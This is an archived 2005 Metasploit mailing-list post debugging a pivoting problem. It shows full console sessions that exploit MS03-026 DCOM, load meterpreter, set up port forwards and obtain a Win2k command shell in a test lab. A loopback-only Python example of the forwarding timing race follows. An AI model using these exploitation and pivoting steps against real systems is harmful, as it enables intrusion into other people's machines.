Metasploit mailing list archives

use of meterpreter (copy for the list )


From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 20 Apr 2005 02:20:02 -0500

On Wed, Apr 20, 2005 at 08:01:13AM +0200, Thomas Werth wrote:
> Using a single port forward, exploitation works. (I didn't use a 3rd-party
> tool; instead I used reverse exploitation direct to the attacking host.)
>
> I hope you'll find that bug; if I can help, send me a "special" version and
> I'll supply detailed output.

I tried to reproduce this tonight and wasn't successful.  In my test
network I had to create an SSH tunnel to forward the exploitation to the
initial box, but that shouldn't factor into this issue.  Here's the way
things were set up:

SSH tunnels:
------------
127.0.0.1:9000 forwarded to 192.168.64.128:135  (WinXP proxy)
127.0.0.1:4444 forwarded to 192.168.64.128:4444 (WinXP proxy)

Meterpreter tunnels:
127.0.0.1:5000 forwarded to 192.168.64.132:135  (Win2k behind WinXP)
127.0.0.1:5001 forwarded to 192.168.64.132:5001 (Win2k behind WinXP)

In my test network I was unable to communicate directly with the Win2k
box, so I had to go through the WinXP box (via meterpreter).

Metasploit instance #1:
-----------------------

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > set
LPORT: 4444
PAYLOAD: win32_bind_meterpreter
RHOST: 127.0.0.1
RPORT: 8000
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x6836
[*] Got connection from 127.0.0.1:57312 <-> 127.0.0.1:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter> use -m Net
loadlib: Loading library from 'ext556839.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> portfwd -a -l 5000 -h 192.168.64.132 -p 135
portfwd: Successfully created local listener on port 5000.

... wait for instance #2 to display 'Connected to REMACT...' ...

meterpreter> portfwd -a -l 5001 -h 192.168.64.132 -p 5001
portfwd: Successfully created local listener on port 5001.
meterpreter> 

Metasploit instance #2:
-----------------------

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 5000
RPORT -> 5000
msf msrpc_dcom_ms03_026(win32_bind) > set LPORT 5001
LPORT -> 5001
msf msrpc_dcom_ms03_026(win32_bind) > set
LPORT: 5001
PAYLOAD: win32_bind
RHOST: 127.0.0.1
RPORT: 5000
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xba20

... created portfwd on 5001 in instance #1 ...

[*] Got connection from 127.0.0.1:40577 <-> 127.0.0.1:5001

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

As far as I can tell this seems to be nearly (if not exactly) the same
thing as what you tried, so I'm not sure why you would be having a
different experience than the one I'm having.  My only guess is that
you are creating the connection handler port forward too soon, thus
causing the bind handler to establish before the exploit actually
finishes.  I figure we should probably take this thread off-list soon as
I imagine people are probably tired of seeing our spam :)  Let me know
if the above output helps at all...
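The timing problem mmiller suspects, as an added loopback-only example that is not code from this list or from Metasploit: a minimal TCP forwarder in the style of portfwd (a local listener that accepts first and only then connects onward), a constructed stand-in for the far-side bind shell that sends a banner, and the two orderings of "create the forward" versus "the far side starts listening". All ports are ephemeral loopback ports and the banner text is constructed.

```python
import contextlib, socket, threading

BANNER = b"Microsoft Windows 2000 [Version 5.00.2195]\r\n"  # constructed: what the far-side shell sends

def relay(src, dst):  # copy src -> dst until EOF, then half-close dst so its peer sees EOF too
    with contextlib.suppress(OSError):
        while data := src.recv(4096):
            dst.sendall(data)
    with contextlib.suppress(OSError):
        dst.shutdown(socket.SHUT_WR)

def listen_local():  # bound, listening socket on an ephemeral loopback port
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s

def start_forwarder(backend_port):  # stand-in for 'portfwd -a -l <lport> -h <host> -p <rport>'
    lsock = listen_local()  # from now on clients complete the TCP handshake even if nothing is behind us
    def serve():
        client, _ = lsock.accept()
        try:
            backend = socket.create_connection(("127.0.0.1", backend_port), timeout=1)
        except OSError:  # far side not listening yet: all the client ever sees is an immediate EOF
            client.close()
            return
        threading.Thread(target=relay, args=(client, backend), daemon=True).start()
        relay(backend, client)
    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()[1]

def start_banner_backend():  # constructed stand-in for the bind shell: greets, then hangs up
    s = listen_local()
    def serve():
        with s.accept()[0] as c:
            c.sendall(BANNER)
    threading.Thread(target=serve, daemon=True).start()
    return s.getsockname()[1]

def probe(forward_port):  # what the bind handler experiences: connect through the forward, read to EOF
    with socket.create_connection(("127.0.0.1", forward_port), timeout=2) as c:
        return b"".join(iter(lambda: c.recv(4096), b""))

def session_outcome(backend_ready):
    # Forward created after the backend listens -> the banner. Created first -> b'': the connect still
    # 'succeeds' (our listener completes the handshake), but the forwarder finds nothing behind it.
    if backend_ready:
        return probe(start_forwarder(start_banner_backend()))
    with listen_local() as tmp:
        unused_port = tmp.getsockname()[1]  # closed again at once, so nothing listens there
    return probe(start_forwarder(unused_port))
```

The "Got connection from ..." line in instance #2 corresponds to the handshake completing against the local listener, which is why it prints even in the too-early ordering; only the later EOF tells the two cases apart.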


